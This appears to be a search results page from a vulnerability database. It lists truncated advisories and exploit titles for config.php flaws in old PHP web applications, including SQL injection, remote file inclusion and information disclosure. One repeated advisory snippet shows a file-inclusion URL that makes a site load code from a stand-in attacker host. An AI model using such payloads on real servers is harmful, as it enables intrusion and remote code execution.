662 matches found
BlogPHP config.php SQL injection login bypass
--------------------Summary---------------- Software: BlogPHP Sowtware's Web Site: http://www.blogphp.net/ Versions: 12 Type: SQL Injection Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: imei -----------------Description--------------- Vulnerable scripts...
CVE-2005-4686
PunBB 1.2.9, when used alone or with F-ART BLOG:CMS, includes config.php before calling the unregisterglobals function, which allows attackers to obtain unspecified sensitive information...
CVE-2005-4214
CVE-2005-4214 concerns phpCOIN 1.2.2. Affected component: installation/config flow via config.php. Root cause: the _CCFG['_PKG_PATH_DBSE'] variable is not defined, causing an error message that leaks the installation path to remote attackers. Impact: partial disclosure of information (installatio...
EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit
Exploit for unknown platform in category web applications ====================================================================== EkinBoard 1.0.3 config.php SQL Injection / Command Execution Exploit ====================================================================== this works with magicquotesg...
EkinBoard 1.0.3 - config.php SQL Injection Command Execution
EkinBoard 1.0.3 - config.php SQL Injection Command Execution this works with magicquotesgpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields, then go! required php.ini settings to launch this script: allowcalltimepassreference = on...
EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit
No description provided by source. ?php ---ekin103xpl.php 10.47 16/11/2005 EkinBoard 1.0.3 config.php SQL Injection through cookie / remote commands execution --- this works with magicquotesgpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields,...
EkinBoard 1.0.3 - '/config.php' SQL Injection / Command Execution
this works with magicquotesgpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields, then go! required php.ini settings to launch this script: allowcalltimepassreference = on registerglobals = on Sun-Tzu: "The rising of birds in their flight is th...
CVE-2005-2544
PHP remote file inclusion vulnerability in config.php in Comdev eCommerce 3.0 allows remote attackers to execute arbitrary PHP code via the pathdocroot parameter...
Comdev eCommerce config.php Vulnerability
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...
comdevInclusion.txt
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...
CVE-2005-2149
config.php in Cacti 0.8.6e and earlier allows remote attackers to set the nohttpheaders switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...
CVE-2005-2149
config.php in Cacti 0.8.6e and earlier allows remote attackers to set the nohttpheaders switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...
CVE-2005-2149
CVE-2005-2149 affects Cacti
DEBIAN-CVE-2005-2149
config.php in Cacti 0.8.6e and earlier allows remote attackers to set the nohttpheaders switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...
CVE-2005-1696
Multiple cross-site scripting XSS vulnerabilities in PostNuke 0.750 and 0.760RC3 allow remote attackers to inject arbitrary web script or HTML via the 1 skin or 2 paletteid parameter to demo.php in the Xanthia module, or 3 the serverName parameter to config.php in the Multisites aka NS-Multisites...
CVE-2005-1696
Multiple cross-site scripting XSS vulnerabilities in PostNuke 0.750 and 0.760RC3 allow remote attackers to inject arbitrary web script or HTML via the 1 skin or 2 paletteid parameter to demo.php in the Xanthia module, or 3 the serverName parameter to config.php in the Multisites aka NS-Multisites...
phpBB Upload Script "up.php" Arbitrary File Upload
Advisory 1 "phpBB Upload Script "up.php" Arbitrary File Upload" $ Author: Status-x $ Contact: [email protected] - [email protected] $ Date: 7 April 2005 $ Website: http://defacers.com.mx $ Original Advisory: http://www.defacers.com.mx/advisories/2.txt $ Risk: High $ Vendor URL:...
CVE-2004-1504
The CVE concerns Just Another Flat File (JAF) CMS 3.0RC. The vulnerability is in the displaycontent function of config.php, which allows remote attackers to gain sensitive information by supplying a blank show parameter; an error message reveals the installation path (demonstrated with index.php)...
phphpbb2 + php version < 4.3.10 unserialize() memory dump sql password from config.php exploit
php bug in ext/standart/varunserializer.c in php 4.3.10 for dump php heap memory with phpbb2 ,who use unserialize for cookie , and found the config.phpsql password in the heap. you need http://overdose.tcpteam.org/serv.h and http://overdose.tcpteam.org/serv.cpp for compile / coded by overdose...
PhpDig 1.6.x: remote command execution
Product: PhpDig 1.6.x Vendor: phpdig.net Author: FraMe frame at kernelpanik.org URL: http://www.kernelpanik.org CONTENTS 1. Overview 2. Description. 3. Details 4. Patches. 1. Overview. PhpDig is a http spider/search engine written in Php with a MySql database in backend. PhpDig builds a glossary...